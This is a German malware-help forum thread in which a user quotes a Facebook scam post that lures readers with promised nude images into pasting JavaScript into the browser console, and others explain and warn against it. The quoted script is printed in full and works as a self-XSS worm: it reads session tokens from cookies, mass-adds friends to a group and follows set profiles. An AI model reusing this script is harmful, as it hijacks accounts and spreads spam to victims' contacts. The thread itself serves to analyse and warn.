Zurück   Trojaner-Board > Malware entfernen > Überwachung, Datenschutz und Spam

Überwachung, Datenschutz und Spam: Merkwürdiger Post von FB: soll in Konsole Code einfügen

Windows 7 Fragen zu Verschlüsselung, Spam, Datenschutz & co. sind hier erwünscht. Hier geht es um Abwehr von Keyloggern oder aderen Spionagesoftware wie Spyware und Adware. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Benötigst du Hilfe beim Trojaner entfernen oder weil du dir einen Virus eingefangen hast, erstelle ein Thema in den oberen Bereinigungsforen.

Antwort
Alt 05.03.2014, 23:03   #1
Rybio
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Hallo,
ich habe gerade folgendes in einer meiner Facebook-Gruppen entdeckt und es kommt mit sehr verdächtig vor:

Zitat:
Du willst Nacktbilder und HeißeVideos von mir? dann befolge diese schritte und du wirst automatisch zur meiner seite weitergeleitet

Neu:: Ihr könnt jetzt mit mir da chatten !!

Funktioniert nur mit Firefox oder Google Chrome!
1. Gruppe Öffnen
2. F12 drücken bei Chrome oder Rechtsklick -> Element untersuchen bei Firefox
3. auf "Console"
4. Den gesamten unten stehenden Code kopieren
5. mit STRG + V einfügen und Enter drücken!
6. Lasst nen Like da wenns euch geholfen hat c:

Hier ist der Code :
Code:
ATTFilter
(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='hxxp://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("100002751510540");
a("1714456490");

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};
         
Ich streue hier mal ganz vorsichtig meine Vermutung ein, dass hier ein paar Acc`s gehackt/benutzt wurden, da ein bunt-gemischtes Publikum (m/w) die Bilder als sexy kommentiert hat.
Aus dem Code lese ich Abonnenten, Ajax/Groups (ich glaube nicht, dass es sich um die Programmiersprache handelt...) usw raus. Ich bin aber nur ein Laie und kann nur vermuten, was pasiert, wenn man das macht.

Könntet Ihr mich bitte aufklären?

PS: Ich glaube eure Zeiteinstellung ist nicht ganz richtig, habe diesen Beitrag um 23.03 Uhr geschrieben und nicht um 00:03 Uhr...

Geändert von Rybio (05.03.2014 um 23:19 Uhr)

Alt 06.03.2014, 08:18   #2
Acid303
 

Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Sieht aus wie Java Script, aber da hab ich selbst keinen Plan von. Aber da mein Avast sich mit

Zitat:
Infektion: JS:FBAutolike-A [Trj]
gemeldet hat als ich diesen Beitrag geöffnet habe liegt die Vermutung nahe.

Gruß

Acid
__________________

__________________

Alt 07.03.2014, 21:48   #3
Rybio
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Java Script könnte sein.

Weiß jemand genau was passiert?
__________________

Alt 07.03.2014, 21:50   #4
mort
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Ja, es ist Java Script. Und wie der Name schon sagt, er liket.

Alt 07.03.2014, 22:00   #5
Rybio
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Ich hab mal versucht das zu googeln, kam nix brauchbares (deutsches) dabei raus
Also wenn ich den Code einfüge, wird dann mein PC infiziert oder nur über mein Profil irgendwelche FB-Seiten geliked?


Alt 07.03.2014, 22:02   #6
mort
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Warum solltest du den Ausführen. Der solle nur irgendwas liken.

Alt 07.03.2014, 22:44   #7
Rybio
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Ich wollte einfach wissen was passiert. Also ist das ja relativ harmlos.


Alt 08.03.2014, 08:21   #8
Fragerin
/// TB-Senior
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Den Benutzer über die Konsole Code ausführen lassen - das ist ja schon fast wie im "This is an Albanian Virus"-Witz :-)
__________________
Zum Schutz vor Trojanerinnen und Femaleware ist bei einem aktuellen Windows 10 die Windows-Defenderin ausreichend.

Alt 25.09.2014, 22:28   #9
eisfeld
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Bitte lieber Admin oder Mod, nehmt diesen Code sofort aus dem Beitrag raus!!!!

Er ist nicht nur da um etwas zu liken, er soll die User-ID und den Token auslesen und verschicken. Damit würden Fremndaccount gekapert. Wenn den ein paar Scriptkiddies in die Finger bekommen :O

Und niemals etwas in der Konsole ausführen!

Alt 26.09.2014, 17:28   #10
Spitzel
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Das ist ein Javascript welches von Facebook ausgeführt wird und dann like ihr automatisch eine Seite/Bild oder ganze Posts..

Wenn man das im Loop macht, könnt Ihr sogar ausgenutzt werden um als Like Bot zu dienen...

Ich kenne das so, dass du den Code in der Konsole eingeben sollst, wenn du das machst, dann wird dein Account von einem Bot-Server übernommen und der schickt deinen Freunden immer weiter diese Meldung.

Geändert von Spitzel (26.09.2014 um 18:03 Uhr)

Alt 28.09.2014, 12:47   #11
burningice
/// Malwareteam
 
Merkwürdiger Post von FB: soll in Konsole Code einfügen - Standard

Merkwürdiger Post von FB: soll in Konsole Code einfügen



Das ist ein typischer Versuch, dich dazu zu bringen, ein JavaScript - Stück auf Fb ausführen zu lassen:

Wenn du das machst, passiert typischerweise eines oder mehreres der folgenden Sachen:

* Du schreibst allen deinen Freunden eine Nachricht, typischerweise um das selbe zu tun oder irgendwas zu klicken oder zu liken
* Du lädst deine Freunde in einen Gruppenchat und schickst ihnen da irgendwelche Links
* Du lädst alle deine Freunde in eine geheime Gruppe mit diversem Inhalt ein
* Du lädst alle Freunde zu einer Veranstaltung ein
* ...

Bloss nicht machen! Das ist nichts ausser peinlich für dich und du bekommst niemals, was dir vorher versprochen wird.

Kenn mehreren Leuten, denen das passiert ist.
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Antwort

Themen zu Merkwürdiger Post von FB: soll in Konsole Code einfügen
automatisch, bilder, bla, blank, center, chat, code, connection, data, entdeck, entdeckt, escape, filter, firefox, folge, folgendes, found, google, information, laden, leute, members, rechtsklick, seite, strg



Ähnliche Themen: Merkwürdiger Post von FB: soll in Konsole Code einfügen


  1. Windows 7: CMD-Konsole öffnet bei Systemstart Farmaster.net
    Log-Analyse und Auswertung - 26.09.2014 (9)
  2. Windows 7: CMD-Konsole öffnet bei Systemstart Farmaster.net
    Log-Analyse und Auswertung - 21.09.2014 (12)
  3. Kopieren & Einfügen funktioniert nicht immer
    Plagegeister aller Art und deren Bekämpfung - 05.08.2013 (19)
  4. Konsole mit Systemrechten
    Diskussionsforum - 08.06.2013 (17)
  5. GVU Virus Soll 100 Euro bezahlen oder COmputer wird in 48h gesperrt (10 stelliger Code)
    Plagegeister aller Art und deren Bekämpfung - 29.11.2012 (2)
  6. Kann imageres.dll Nicht Einfügen
    Plagegeister aller Art und deren Bekämpfung - 26.10.2012 (1)
  7. Post von web.de abuser, ebay und der Bank :-( Trojaner Zeus, was soll ich tun?
    Plagegeister aller Art und deren Bekämpfung - 06.08.2012 (1)
  8. BKA Trojaner - Keine Konsole im abgesichertem Modus (XP)
    Plagegeister aller Art und deren Bekämpfung - 08.12.2011 (16)
  9. Windows Konsole mit Adminrechten starten
    Alles rund um Windows - 17.09.2009 (2)
  10. Probleme mit Start von Tastkmanager, tasklist auif Konsole und kein Löschen der Mw
    Mülltonne - 08.11.2008 (0)
  11. Kann nichts mehr kopieren/einfügen!!!!
    Alles rund um Windows - 20.03.2007 (2)
  12. Mit der W-Konsole Fehler in XP beseitigen ?
    Alles rund um Windows - 28.12.2005 (4)
  13. Einfügen geht nicht mehr....
    Lob, Kritik und Wünsche - 04.01.2005 (4)
  14. einfügen von bewegten bildern??
    Alles rund um Windows - 04.10.2004 (2)
  15. aktive Konsole in Tray schieben ?
    Alles rund um Mac OSX & Linux - 31.10.2003 (17)
  16. Photoshop: Muster einfügen
    Alles rund um Windows - 27.06.2003 (2)

Zum Thema Merkwürdiger Post von FB: soll in Konsole Code einfügen - Hallo, ich habe gerade folgendes in einer meiner Facebook-Gruppen entdeckt und es kommt mit sehr verdächtig vor: Zitat: Du willst Nacktbilder und HeißeVideos von mir? dann befolge diese schritte und - Merkwürdiger Post von FB: soll in Konsole Code einfügen...
Archiv
Du betrachtest: Merkwürdiger Post von FB: soll in Konsole Code einfügen auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.